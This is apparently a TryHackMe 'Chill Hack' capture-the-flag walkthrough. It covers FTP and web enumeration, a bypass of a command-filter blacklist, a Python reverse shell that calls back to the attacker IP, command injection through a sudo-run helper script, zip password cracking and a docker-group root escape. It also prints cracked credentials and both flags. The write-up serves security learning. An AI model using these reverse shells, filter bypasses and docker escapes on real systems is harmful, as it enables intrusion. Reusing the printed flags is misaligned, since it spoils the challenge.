TryHackMe-Chill-Hack
Chill the Hack out of the Machine.
Easy level CTF. Capture the flags and have fun!
User Flag
Initial foothold
An initial scan confirms that 3 services are exposed:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.50.72 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA) | 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA) |_ 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Game Info
FTP
Starting with FTP, we connect as anonymous
and discover a note that discloses 2 usernames (anurodh
and apaar
) and tells us we will have to bypass a protection when entering our command
(we’ll see that later).
kali@kali:/data/Chill_Hack$ ftp 10.10.51.62 Connected to 10.10.51.62. 220 (vsFTPd 3.0.3) Name (10.10.51.62:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 115 4096 Oct 03 2020 . drwxr-xr-x 2 0 115 4096 Oct 03 2020 .. -rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt 226 Directory send OK. ftp> get note.txt - remote: note.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note.txt (90 bytes). Anurodh told me that there is some filtering on strings being put in the command -- Apaar 226 Transfer complete. 90 bytes received in 0.00 secs (62.4667 kB/s)
Web
The enumeration of the web server with gobuster highlights the presence of a /secret
directory.
kali@kali:/data/vpn$ gobuster dir -u http://10.10.51.62 -x txt,php,tar,zip -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.51.62 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,php,tar,zip [+] Timeout: 10s =============================================================== 2021/04/26 12:39:53 Starting gobuster =============================================================== /.hta (Status: 403) /.hta.txt (Status: 403) /.hta.php (Status: 403) /.hta.tar (Status: 403) /.hta.zip (Status: 403) /.htaccess (Status: 403) /.htaccess.txt (Status: 403) /.htaccess.php (Status: 403) /.htaccess.tar (Status: 403) /.htaccess.zip (Status: 403) /.htpasswd (Status: 403) /.htpasswd.tar (Status: 403) /.htpasswd.zip (Status: 403) /.htpasswd.txt (Status: 403) /.htpasswd.php (Status: 403) /contact.php (Status: 200) /css (Status: 301) /fonts (Status: 301) /images (Status: 301) /index.html (Status: 200) /js (Status: 301) /secret (Status: 301) <------------------------ interesting! /server-status (Status: 403) =============================================================== 2021/04/26 12:41:48 Finished ===============================================================
Browsing this resource shows a form that allows to execute a command (remember the hint from the FTP service).
kali@kali:/data/vpn$ curl -s http://10.10.51.62/secret/ <html> <body> <form method="POST"> <input id="comm" type="text" name="command" placeholder="Command"> <button>Execute</button> </form> </body> </html>
Some commands work (e.g. id
), meaning that they are not filtered:
kali@kali:/data/Chill_Hack$ curl -X POST -d "command=id" http://10.10.51.62/secret/ <html> <body> <form method="POST"> <input id="comm" type="text" name="command" placeholder="Command"> <button>Execute</button> </form> <h2 style="color:blue;">uid=33(www-data) gid=33(www-data) groups=33(www-data) </h2> <style> body { background-image: url('images/blue_boy_typing_nothought.gif'); background-position: center center; background-repeat: no-repeat; background-attachment: fixed; background-size: cover; } </style> </body> </html>
Bypass protection
If we were able to execute id
, this command won’t really help us to go further, and we will obviously need to set up a reverse shell. As we assumed from the previous hint, it is confirmed that there is a filter that prevents from injecting some strings, like ls
, cat
, more
, less
, …
That said, we can find alternatives. For example, xxd
is permitted to read files instead of cat
:
kali@kali:/data/Chill_Hack$ curl -X POST -d "command=xxd%20index.php" http://10.10.51.62/secret/ <html> <body> <form method="POST"> <input id="comm" type="text" name="command" placeholder="Command"> <button>Execute</button> </form> <h2 style="color:blue;">00000000: 3c68 746d 6c3e 0a3c 626f 6479 3e0a 0a3c <html>.<body>..< 00000010: 666f 726d 206d 6574 686f 643d 2250 4f53 form method="POS 00000020: 5422 3e0a 2020 2020 2020 2020 3c69 6e70 T">. <inp 00000030: 7574 2069 643d 2263 6f6d 6d22 2074 7970 ut id="comm" typ 00000040: 653d 2274 6578 7422 206e 616d 653d 2263 e="text" name="c 00000050: 6f6d 6d61 6e64 2220 706c 6163 6568 6f6c ommand" placehol 00000060: 6465 723d 2243 6f6d 6d61 6e64 223e 0a20 der="Command">. 00000070: 2020 2020 2020 203c 6275 7474 6f6e 3e45 <button>E 00000080: 7865 6375 7465 3c2f 6275 7474 6f6e 3e0a xecute</button>. 00000090: 3c2f 666f 726d 3e0a 3c3f 7068 700a 2020 </form>.<?php. 000000a0: 2020 2020 2020 6966 2869 7373 6574 2824 if(isset($ 000000b0: 5f50 4f53 545b 2763 6f6d 6d61 6e64 275d _POST['command'] 000000c0: 2929 0a20 2020 2020 2020 207b 0a20 2020 )). {. 000000d0: 2020 2020 2020 2020 2020 2020 2024 636d $cm 000000e0: 6420 3d20 245f 504f 5354 5b27 636f 6d6d d = $_POST['comm 000000f0: 616e 6427 5d3b 0a20 2020 2020 2020 2020 and'];. 00000100: 2020 2020 2020 2024 7374 6f72 6520 3d20 $store = 00000110: 6578 706c 6f64 6528 2220 222c 2463 6d64 explode(" ",$cmd 00000120: 293b 0a20 2020 2020 2020 2020 2020 2020 );. 00000130: 2020 2024 626c 6163 6b6c 6973 7420 3d20 $blacklist = 00000140: 6172 7261 7928 276e 6327 2c20 2770 7974 array('nc', 'pyt 00000150: 686f 6e27 2c20 2762 6173 6827 2c27 7068 hon', 'bash','ph 00000160: 7027 2c27 7065 726c 272c 2772 6d27 2c27 p','perl','rm',' 00000170: 6361 7427 2c27 6865 6164 272c 2774 6169 cat','head','tai 00000180: 6c27 2c27 7079 7468 6f6e 3327 2c27 6d6f l','python3','mo 00000190: 7265 272c 276c 6573 7327 2c27 7368 272c re','less','sh', 000001a0: 276c 7327 293b 0a20 2020 2020 2020 2020 'ls');. 000001b0: 2020 2020 2020 2066 6f72 2824 693d 303b for($i=0; 000001c0: 2024 693c 636f 756e 7428 2473 746f 7265 $i<count($store 000001d0: 293b 2024 692b 2b29 0a20 2020 2020 2020 ); $i++). 000001e0: 2020 2020 2020 2020 207b 0a20 2020 2020 {. 000001f0: 2020 2020 2020 2020 2020 2020 2020 2020 00000200: 2020 2066 6f72 2824 6a3d 303b 2024 6a3c for($j=0; $j< 00000210: 636f 756e 7428 2462 6c61 636b 6c69 7374 count($blacklist 00000220: 293b 2024 6a2b 2b29 0a20 2020 2020 2020 ); $j++). 00000230: 2020 2020 2020 2020 2020 2020 2020 2020 00000240: 207b 0a20 2020 2020 2020 2020 2020 2020 {. 00000250: 2020 2020 2020 2020 2020 2020 2020 2020 00000260: 2020 2069 6628 2473 746f 7265 5b24 695d if($store[$i] 00000270: 203d 3d20 2462 6c61 636b 6c69 7374 5b24 == $blacklist[$ 00000280: 6a5d 290a 0909 0909 7b3f 3e0a 0909 0909 j]).....{?>..... 00000290: 093c 6831 2073 7479 6c65 3d22 636f 6c6f .<h1 style="colo 000002a0: 723a 7265 643b 223e 4172 6520 796f 7520 r:red;">Are you 000002b0: 6120 6861 636b 6572 3f3c 2f68 313e 0a09 a hacker?</h1>.. 000002c0: 0909 0909 3c73 7479 6c65 3e0a 0909 0909 ....<style>..... 000002d0: 0909 626f 6479 0a09 0909 0909 097b 0a09 ..body.......{.. 000002e0: 0909 0909 0909 6261 636b 6772 6f75 6e64 ......background 000002f0: 2d69 6d61 6765 3a20 7572 6c28 2769 6d61 -image: url('ima 00000300: 6765 732f 4661 696c 696e 674d 6973 6572 ges/FailingMiser 00000310: 6162 6c65 4577 652d 7369 7a65 5f72 6573 ableEwe-size_res 00000320: 7472 6963 7465 642e 6769 6627 293b 0a09 tricted.gif');.. 00000330: 0909 0909 0909 6261 636b 6772 6f75 6e64 ......background 00000340: 2d70 6f73 6974 696f 6e3a 2063 656e 7465 -position: cente 00000350: 7220 6365 6e74 6572 3b0a 2020 0909 0909 r center;. .... 00000360: 0909 0962 6163 6b67 726f 756e 642d 7265 ...background-re 00000370: 7065 6174 3a20 6e6f 2d72 6570 6561 743b peat: no-repeat; 00000380: 0a20 2009 0909 0909 0909 6261 636b 6772 . .......backgr 00000390: 6f75 6e64 2d61 7474 6163 686d 656e 743a ound-attachment: 000003a0: 2066 6978 6564 3b0a 2020 0909 0909 0909 fixed;. ...... 000003b0: 0962 6163 6b67 726f 756e 642d 7369 7a65 .background-size 000003c0: 3a20 636f 7665 723b 0909 0909 090a 097d : cover;.......} 000003d0: 090a 0909 0909 093c 2f73 7479 6c65 3e0a .......</style>. 000003e0: 3c3f 7068 7009 0909 0909 2072 6574 7572 <?php..... retur 000003f0: 6e3b 0a09 0909 097d 0a20 2020 2020 2020 n;.....}. 00000400: 2020 2020 2020 2020 2020 2020 2020 2020 00000410: 207d 0a20 2020 2020 2020 2020 2020 2020 }. 00000420: 2020 207d 0a09 093f 3e3c 6832 2073 7479 }...?><h2 sty 00000430: 6c65 3d22 636f 6c6f 723a 626c 7565 3b22 le="color:blue;" 00000440: 3e3c 3f70 6870 2065 6368 6f20 7368 656c ><?php echo shel 00000450: 6c5f 6578 6563 2824 636d 6429 3b3f 3e3c l_exec($cmd);?>< 00000460: 2f68 323e 0a09 0909 3c73 7479 6c65 3e0a /h2>....<style>. 00000470: 2020 2020 2020 2020 2020 2020 2020 2020 00000480: 2020 2020 2020 2020 2020 2020 2062 6f64 bod 00000490: 790a 2020 2020 2020 2020 2020 2020 2020 y. 000004a0: 2020 2020 2020 2020 2020 2020 2020 207b { 000004b0: 0a20 2020 2020 2020 2020 2020 2020 2020 . 000004c0: 2020 2020 2020 2020 2020 2020 2020 2020 000004d0: 2020 2020 6261 636b 6772 6f75 6e64 2d69 background-i 000004e0: 6d61 6765 3a20 7572 6c28 2769 6d61 6765 mage: url('image 000004f0: 732f 626c 7565 5f62 6f79 5f74 7970 696e s/blue_boy_typin 00000500: 675f 6e6f 7468 6f75 6768 742e 6769 6627 g_nothought.gif' 00000510: 293b 2020 0a09 0909 0920 2020 6261 636b ); ..... back 00000520: 6772 6f75 6e64 2d70 6f73 6974 696f 6e3a ground-position: 00000530: 2063 656e 7465 7220 6365 6e74 6572 3b0a center center;. 00000540: 2020 0909 0909 2020 2062 6163 6b67 726f .... backgro 00000550: 756e 642d 7265 7065 6174 3a20 6e6f 2d72 und-repeat: no-r 00000560: 6570 6561 743b 0a20 2009 0909 0920 2020 epeat;. .... 00000570: 6261 636b 6772 6f75 6e64 2d61 7474 6163 background-attac 00000580: 686d 656e 743a 2066 6978 6564 3b0a 2020 hment: fixed;. 00000590: 0909 0909 2020 2062 6163 6b67 726f 756e .... backgroun 000005a0: 642d 7369 7a65 3a20 636f 7665 723b 0a7d d-size: cover;.} 000005b0: 0a20 2020 2020 2020 2020 2020 2020 2020 . 000005c0: 2020 2020 2020 2020 2020 203c 2f73 7479 </sty 000005d0: 6c65 3e0a 093c 3f70 6870 207d 0a3f 3e0a le>..<?php }.?>. 000005e0: 3c2f 626f 6479 3e0a 3c2f 6874 6d6c 3e0a </body>.</html>. </h2> <style> body { background-image: url('images/blue_boy_typing_nothought.gif'); background-position: center center; background-repeat: no-repeat; background-attachment: fixed; background-size: cover; } </style> </body> </html>
Instead of ls
, we can use echo *
:
kali@kali:/data/Chill_Hack$ curl -X POST -d "command=echo%20*" http://10.10.51.62/secret/ <html> <body> <form method="POST"> <input id="comm" type="text" name="command" placeholder="Command"> <button>Execute</button> </form> <h2 style="color:blue;">images index.php </h2> <style> body { background-image: url('images/blue_boy_typing_nothought.gif'); background-position: center center; background-repeat: no-repeat; background-attachment: fixed; background-size: cover; } </style> </body> </html>
Download reverse shell
After many failed attempts to download a reverse shell (because we don’t have write permissions on the web directories), I eventually found that I could execute a python reverse shell by escaping a character of the python
string, as follows:
POST /secret/ HTTP/1.1 Host: mafialive.thm User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://mafialive.thm/secret/ Content-Type: application/x-www-form-urlencoded Content-Length: 233 Connection: close Upgrade-Insecure-Requests: 1 command=p\ython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Here is the reverse shell window:
kali@kali:/data/Chill_Hack/files$ rlwrap nc -nlvp 4444 listening on [any] 4444 ... connect to [10.8.50.72] from (UNKNOWN) [10.10.9.76] 53142 www-data@ubuntu:/var/www/html/secret$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
The files web directory
After failing at searching for the user flag in the /home
directory, I eventually found an interesting directory in /var/www/files/
www-data@ubuntu:/var/www/files$ ll ll total 28 drwxr-xr-x 3 root root 4096 Oct 3 2020 . drwxr-xr-x 4 root root 4096 Oct 3 2020 .. -rw-r--r-- 1 root root 391 Oct 3 2020 account.php -rw-r--r-- 1 root root 453 Oct 3 2020 hacker.php drwxr-xr-x 2 root root 4096 Oct 3 2020 images -rw-r--r-- 1 root root 1153 Oct 3 2020 index.php -rw-r--r-- 1 root root 545 Oct 3 2020 style.css www-data@ubuntu:/var/www/files$ cat hacker.php cat hacker.php <html> <head> <body> <style> body { background-image: url('images/002d7e638fb463fb7a266f5ffc7ac47d.gif'); } h2 { color:red; font-weight: bold; } h1 { color: yellow; font-weight: bold; } </style> <center> <img src = "images/hacker-with-laptop_23-2147985341.jpg"><br> <h1 style="background-color:red;">You have reached this far. </h2> <h1 style="background-color:black;">Look in the dark! You will find your answer</h1> </center> </head> </html>
Download the image (images/hacker-with-laptop_23-2147985341.jpg
). There is a secret in it.
kali@kali:/data/Chill_Hack/files$ file hacker-with-laptop_23-2147985341.jpg hacker-with-laptop_23-2147985341.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 626x417, components 3 kali@kali:/data/Chill_Hack/files$ steghide extract -sf hacker-with-laptop_23-2147985341.jpg Enter passphrase: wrote extracted data to "backup.zip".
The resulting backup.zip
file is a password compressed archive. Let’s crack the password.
kali@kali:/data/Chill_Hack/files$ /data/src/john/run/zip2john backup.zip > backup.hash ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: 2b chk, TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 type=8 kali@kali:/data/Chill_Hack/files$ /data/src/john/run/john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status pass1word (backup.zip/source_code.php) 1g 0:00:00:00 DONE (2021-04-26 20:43) 9.090g/s 111709p/s 111709c/s 111709C/s total90..hawkeye Use the "--show" option to display all of the cracked passwords reliably Session completed.
Lateral move (www-data -> anurodh)
The backup contains a PHP file (source_code.php
):
<html>
<head>
Admin Portal
</head>
<title> Site Under Development ... </title>
<body>
<form method="POST">
Username: <input type="text" name="name" placeholder="username"><br><br>
Email: <input type="email" name="email" placeholder="email"><br><br>
Password: <input type="password" name="password" placeholder="password">
<input type="submit" name="submit" value="Submit">
</form>
<?php
if(isset($_POST['submit']))
{
$email = $_POST["email"];
$password = $_POST["password"];
if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
{
$random = rand(1000,9999);?><br><br><br>
<form method="POST">
Enter the OTP: <input type="number" name="otp">
<input type="submit" name="submitOtp" value="Submit">
</form>
<?php mail($email,"OTP for authentication",$random);
if(isset($_POST["submitOtp"]))
{
$otp = $_POST["otp"];
if($otp == $random)
{
echo "Welcome Anurodh!";
header("Location: authenticated.php");
}
else
{
echo "Invalid OTP";
}
}
}
else
{
echo "Invalid Username or Password";
}
}
?>
</html>
This source code reveals a username and a base64 encoded password:
- Username:
Anurodh
- Password:
!d0ntKn0wmYp@ssw0rd
These credentials allow a SSH login as anurodh
.
Lateral move (anurodh -> apaar)
We can execute /home/apaar/.helpline.sh
as apaar
without password:
anurodh@ubuntu:~$ sudo -l Matching Defaults entries for anurodh on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User anurodh may run the following commands on ubuntu: (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
Below is the content of the script:
anurodh@ubuntu:~$ cat /home/apaar/.helpline.sh #!/bin/bash echo echo "Welcome to helpdesk. Feel free to talk to anyone at any time!" echo read -p "Enter the person whom you want to talk with: " person read -p "Hello user! I am $person, Please enter your message: " msg $msg 2>/dev/null echo "Thank you for your precious time!"
anurodh@ubuntu:~$ sudo -u apaar /home/apaar/.helpline.sh Welcome to helpdesk. Feel free to talk to anyone at any time! Enter the person whom you want to talk with: oops Hello user! I am oops, Please enter your message: /bin/bash id uid=1001(apaar) gid=1001(apaar) groups=1001(apaar) python3 -c "import pty;pty.spawn('/bin/bash')" bash: /home/anurodh/.bashrc: Permission denied apaar@ubuntu:~$ cd /home/apaar apaar@ubuntu:/home/apaar$ ls -la total 44 drwxr-xr-x 5 apaar apaar 4096 Oct 4 2020 . drwxr-xr-x 5 root root 4096 Oct 3 2020 .. -rw------- 1 apaar apaar 0 Oct 4 2020 .bash_history -rw-r--r-- 1 apaar apaar 220 Oct 3 2020 .bash_logout -rw-r--r-- 1 apaar apaar 3771 Oct 3 2020 .bashrc drwx------ 2 apaar apaar 4096 Oct 3 2020 .cache drwx------ 3 apaar apaar 4096 Oct 3 2020 .gnupg -rwxrwxr-x 1 apaar apaar 286 Oct 4 2020 .helpline.sh -rw-rw---- 1 apaar apaar 46 Oct 4 2020 local.txt -rw-r--r-- 1 apaar apaar 807 Oct 3 2020 .profile drwxr-xr-x 2 apaar apaar 4096 Oct 3 2020 .ssh -rw------- 1 apaar apaar 817 Oct 3 2020 .viminfo apaar@ubuntu:/home/apaar$ cat local.txt {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
At this stage, it may be a good idea to add your SSH public key (~/.ssh/id_rsa.pub
) to /home/apaar/.ssh/authorized_keys
to connect directly using SSH and benefit from a more stable shell.
User flag: {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
Root Flag
Logging back to anurodh
, we can see that the user is member of the docker group:
anurodh@ubuntu:/home/apaar$ id uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
let’s confirm:
anurodh@ubuntu:/home/apaar$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE alpine latest a24bb4013296 11 months ago 5.57MB hello-world latest bf756fb1ae65 16 months ago 13.3kB
Checking on GTFOBins, we confirm there is a possible privilege escalation; let’s test:
anurodh@ubuntu:/home/apaar$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh # id uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo) # cd /root # ls -la total 68 drwx------ 6 root root 4096 Oct 4 2020 . drwxr-xr-x 24 root root 4096 Oct 3 2020 .. -rw------- 1 root root 0 Oct 4 2020 .bash_history -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc drwx------ 2 root root 4096 Oct 3 2020 .cache drwx------ 3 root root 4096 Oct 3 2020 .gnupg -rw------- 1 root root 370 Oct 4 2020 .mysql_history -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 12288 Oct 4 2020 .proof.txt.swp drwx------ 2 root root 4096 Oct 3 2020 .ssh drwxr-xr-x 2 root root 4096 Oct 3 2020 .vim -rw------- 1 root root 11683 Oct 4 2020 .viminfo -rw-r--r-- 1 root root 166 Oct 3 2020 .wget-hsts -rw-r--r-- 1 root root 1385 Oct 4 2020 proof.txt # cat proof.txt {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg} Congratulations! You have successfully completed the challenge. ,-.-. ,----. _,.---._ .-._ ,----. ,-..-.-./ \==\ ,-.--` , \ _.-. _.-. _,..---._ ,-.' , - `. /==/ \ .-._ ,-.--` , \ |, \=/\=|- |==||==|- _.-` .-,.'| .-,.'| /==/, - \ /==/_, , - \|==|, \/ /, /==|- _.-` |- |/ |/ , /==/|==| `.-.|==|, | |==|, | |==| _ _\==| .=. |==|- \| ||==| `.-. \, , _|==/==/_ , /|==|- | |==|- | |==| .=. |==|_ : ;=: - |==| , | -/==/_ , / | - - , |==|==| .-' |==|, | |==|, | |==|,| | -|==| , '=' |==| - _ |==| .-' \ , - /==/|==|_ ,`-._|==|- `-._|==|- `-._ |==| '=' /\==\ - ,_ /|==| /\ , |==|_ ,`-._ |- /\ /==/ /==/ , //==/ - , ,/==/ - , ,/ |==|-, _`/ '.='. - .' /==/, | |- /==/ , / `--` `--` `--`-----`` `--`-----'`--`-----' `-.`.____.' `--`--'' `--`./ `--`--`-----`` --------------------------------------------Designed By ------------------------------------------------------- | Anurodh Acharya | --------------------- Let me know if you liked it. Twitter - @acharya_anurodh Linkedin - www.linkedin.com/in/anurodh-acharya-b1937116a #
Root flag: {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}